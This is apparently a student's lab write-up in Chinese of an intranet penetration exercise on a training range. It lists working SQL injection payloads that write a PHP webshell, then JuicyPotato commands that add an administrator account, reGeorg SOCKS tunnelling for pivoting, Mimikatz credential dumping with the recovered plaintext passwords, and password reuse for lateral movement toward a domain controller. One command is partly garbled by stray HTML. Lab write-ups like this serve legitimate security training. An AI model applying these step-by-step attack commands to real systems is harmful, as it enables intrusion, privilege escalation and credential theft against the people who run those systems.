内网渗透作业笔记

1.使用sql注入： ?id=1 and 1=2，报错显示出php绝对路径:C:\phpStudy\WWW\index.php

2.使用sql注入： ?id=1 order by 2 ，得知其只有两个字段

3.使用sql注入： ?id=1.1 union select 1,2 得知注入点在第二个字段

4.使用sql注入： ?id=1.1 union select 1,’’ into outfile ‘C:\phpStudy\WWW\LSP.php’ 将一句话木马文件输出文件至LSP.php中（把一句话木马写在第一个字段内也可，只要让php文件有一句话木马就行）

5.访问 http://afsgr16-b1ferw.aqlab.cn/lsp.php?8=phpinfo(); 写入成功

6.上菜刀，成功


7.查询身份，发现只是test用户，需要提权

8.用systeminfo查询主机信息，得知其操作系统为Windows Server 2008 R2，在VMware虚拟机中运行，有2个补丁，IP地址为10.0.1.4，DHCP服务器IP为10.0.1.1

9.上传烂土豆JuicyPotato.exe至目标主机，改名为123.exe，执行123.exe -p “net user aaa 123qwe!<span>@#</span> /add” 和123.exe -p “net localgroup administrators aaa /add”，添加一个管理员账号aaa，密码123qwe!<span>@##CTL{n}://nc0.cdn.zkaq.cn/md/10863/69f457eb0cdd05ff4d047e185761575d_90364.png" alt="">“
10.用netstat -nao | find “3389”查看是否打开3389端口，发现存在

11.尝试远程登录，发现远端是server 2003，非目标主机，说明目标主机IP被路由器映射走了。

12.使用内网代理工具reGeorg入侵

【reGeorg原理整理】
考虑一种场景，资产组里有2台机器：主机A、主机B。其中主机A上运行了Web服务，且IP或者端口映射到公网，可以被外部人员访问，主机B是在外网访问不到的。攻击者通过漏洞在主机A上传了Webshell，但同时又出于某些限制并未能得到主机A的主机权限也无法反弹shell，那么他这个时候，也是无法通过常规方法反弹shell或者直接登录主机A从而访问到主机B的。
reGeorg就在这个时候起了作用，攻击者已经有了主机A的webshell权限（即可以在web服务器中上传文件），而主机A可以和主机B通信。那么在主机A上安装reGeorg工具，使得攻击者发出的请求以及目标机器的响应经过A的http转发，达到攻击者可以和主机B进行通信的效果。
如图：

(1)向目标主机上传tunnel.nosocket.php文件，改为123.php,执行后显示如图

(2)在攻击主机上运行py -2 reGeorgSocksProxy.py -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/123.php，让代理监听起来，监听端口10086

(3)使用Proxifier，修改代理服务器、代理规则，只让远程桌面程序mstsc.exe流量走代理，防止影响网络。如图：


(4)从第8步可知目标内网ip为10.0.1.4，用此IP远程桌面连接走起


13.向目标主机上传mimikatz.exe，用管理员打开，privilege::debug提权，用sakurlsa::logonpasswords获取登录密码。
可得知administrator用户密码为woshifengge1. ，admin用户密码为A1B2C3!.Nf 。可尝试用此密码来撞库

14.在目标主机运行arp -a，得到10.0.1.0网段内还存在其他主机，尝试远程登录

15.在10.0.1.8用administrator密码woshifengge1.撞库登录成功，获得flag

16.在10.0.1.8上用获取信息，得知其在zkaq.cn域内，dns指向为10.0.1.6（大概率为域控）